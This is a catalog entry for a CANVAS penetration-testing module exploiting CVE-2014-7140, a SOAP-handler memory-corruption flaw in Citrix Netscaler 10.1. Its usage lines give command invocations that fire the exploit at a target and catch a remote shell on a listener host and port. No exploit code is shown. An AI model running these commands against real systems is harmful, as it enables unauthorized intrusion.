Immunity, Inc.
Name citrix_netscaler_soap
CVE CVE-2014-7140
Exploit Pack CANVAS
Description Citrix Netscaler 10.1 SOAP exploit
Notes FoundBy: Console Cowboys
Notes:
A vulnerability exists in the SOAP handler of the web interface. A SOAP request
can be crafted to trigger a memory corruption flaw, overwrite the stack and execute our shell.

Based on the exploit discussed at http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.htm

Tested against Citrix Netscaler 10.1
Usage:
./exploits/web/citrix_netscaler_soap.py -v 1 -t 10.10.13.20 -l 10.10.13.1 -d 5555
./commandlineInterface.py -v 1 -p 5555

VENDOR: Citrix
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7140
CVE Name: CVE-2014-7140
